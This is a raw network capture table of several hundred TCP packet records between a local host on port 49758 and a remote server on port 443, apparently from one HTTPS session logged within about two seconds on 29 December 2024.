Dec 29, 2024 17:56:10.990185976 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.992997885 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.993012905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.993086100 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.993093014 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.993136883 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.995515108 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.995528936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.995587111 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.995594025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.995634079 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.155819893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.155838966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.156121016 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.156127930 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.156176090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.157524109 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.157538891 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.157603025 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.157608986 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.157644033 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.160659075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.160672903 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.160727978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.160734892 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.160770893 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.163077116 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.163090944 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.163147926 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.163152933 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.163198948 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.165682077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.165695906 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.165774107 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.165781021 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.165826082 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.200927019 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.200942993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.200980902 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.201122999 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.201122999 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.201138973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.203948021 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.203968048 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.204037905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.204046011 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.206418991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.206432104 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.206490040 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.206497908 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.251166105 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.366653919 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.366671085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.366842031 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.366851091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.366894007 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.368638992 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.368652105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.368701935 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.368705988 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.368740082 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.368752956 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.371736050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.371751070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.371797085 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.371803045 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.371831894 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.371850014 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.374247074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.374262094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.374320030 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.374327898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.374361992 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.376810074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.376828909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.376887083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.376893997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.376934052 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.412311077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.412328959 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.412384987 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.412400961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.412439108 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.414783001 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.414798021 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.414846897 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.414851904 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.414890051 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.417351007 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.417365074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.417427063 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.417439938 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.417479038 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.749775887 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.749794960 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.749847889 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.749854088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.749895096 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.750761986 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.750777960 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.750843048 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.750849962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.750889063 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.751497984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.751512051 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.751570940 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.751575947 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.751614094 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.752470016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.752485037 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.752532959 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.752540112 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.752585888 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.753448009 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.753463030 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.753508091 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.753514051 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.753555059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.755121946 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.755136013 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.755184889 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.755192041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.755229950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.756033897 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.756050110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.756099939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.756105900 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.756145954 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.756962061 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.756970882 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.756977081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.757024050 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.757024050 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.757030010 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.759931087 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.788398981 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.788414955 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.788496017 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.788503885 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.788654089 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.790875912 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.790891886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.790987968 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.790993929 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.791039944 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.794430017 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.794445992 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.794498920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.794507980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.794547081 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.796510935 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.796525002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.796580076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.796586037 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.796618938 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.799725056 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.799740076 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.799777031 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.799783945 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.799810886 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.799824953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.833806038 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.833820105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.833879948 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.833885908 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.833930969 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.836292982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.836307049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.836463928 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.836474895 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.836519003 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.838850975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.838865995 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.838946104 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.838953972 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.839013100 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.839644909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.839701891 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.999515057 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.999531984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.999572992 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.999586105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:11.999608994 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:11.999623060 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.002414942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.002437115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.002470016 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.002479076 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.002507925 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.002521038 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.004895926 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.004911900 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.004971027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.004981041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.005018950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.008059025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.008074045 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.008136988 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.008146048 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.008184910 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.010591030 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.010605097 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.010668039 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.010677099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.010716915 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.045464993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.045480013 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.045532942 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.045541048 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.045576096 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.047883034 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.047898054 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.047947884 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.047955036 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.047990084 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.050533056 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.050549984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.050607920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.050615072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.050652027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.210400105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.210416079 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.210480928 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.210490942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.210534096 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.212934971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.212949038 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.213006020 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.213011980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.213038921 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.213057041 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.216084003 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.216097116 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.216156960 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.216165066 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.216207027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.218507051 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.218521118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.218576908 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.218585968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.218624115 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.221715927 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.221730947 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.221795082 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.221806049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.221831083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.221844912 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.256128073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.256148100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.256196022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.256202936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.256241083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.258531094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.258543968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.258603096 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.258609056 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.258646965 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.261076927 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.261090040 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.261147022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.261153936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.261190891 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.421375990 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.421394110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.421472073 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.421490908 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.421528101 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.424104929 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.424118996 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.424176931 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.424184084 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.424216986 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.426589966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.426604033 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.426657915 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.426664114 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.426701069 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.429781914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.429795980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.429850101 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.429857016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.429892063 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.432327032 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.432339907 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.432393074 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.432400942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.432440042 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.466974974 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.466993093 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.467080116 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.467091084 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.467235088 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.469393969 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.469408035 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.469461918 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.469468117 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.469506025 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.472589970 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.472603083 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.472666979 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.472673893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.472712040 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.631728888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.631746054 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.631890059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.631890059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.631901979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.631938934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.634798050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.634810925 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.634875059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.634881973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.634923935 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.637300968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.637315035 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.637366056 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.637371063 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.637406111 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.639727116 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.639739990 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.639796019 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.639801025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.639837027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.675559044 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.675573111 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.675616026 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.675622940 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.675652027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.675671101 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.677608967 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.677623034 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.677668095 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.677673101 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.677707911 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.680013895 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.680027962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.680078030 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.680087090 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.680108070 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.680121899 CET	49758	443	192.168.2.4	172.67.208.58
